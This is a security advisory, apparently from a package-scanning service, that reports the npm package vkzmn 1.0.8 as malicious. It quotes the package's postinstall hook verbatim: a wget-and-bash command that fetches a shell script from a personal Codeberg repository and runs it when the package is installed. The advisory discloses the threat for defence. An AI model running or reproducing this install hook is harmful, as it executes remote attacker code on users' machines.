npm

vkzmn @1.0.8

Vulnerability report · Last retrieved from osv.dev July 9, 2026 at 6:28 PM UTC

Malicious

OSV ID

MAL-2026-6594

Ecosystem

npm

Summary

package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/worm_teste/raw/branch/main/down_procwork.sh -O d.sh; bash d.sh , downloading a shell script from a mutable branch of an unrelated personal Codeberg repository named worm_teste and executing it via bash on the installer's machine at npm install time. The fetched script is unpinned (mutable main branch), unverified (no hash/signature check), and from a destination that bears no relationship to any declared package purpose — the source repository name itself indicates worm/propagation testing. Whatever bytes the repository owner serves at fetch time execute with the privileges of the user running npm install . The package additionally declares a self-referential dependency ( vkzmn: ^1.0.4 ), consistent with propagation scaffolding rather than a legitimate library.

Source: amazon-inspector (dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.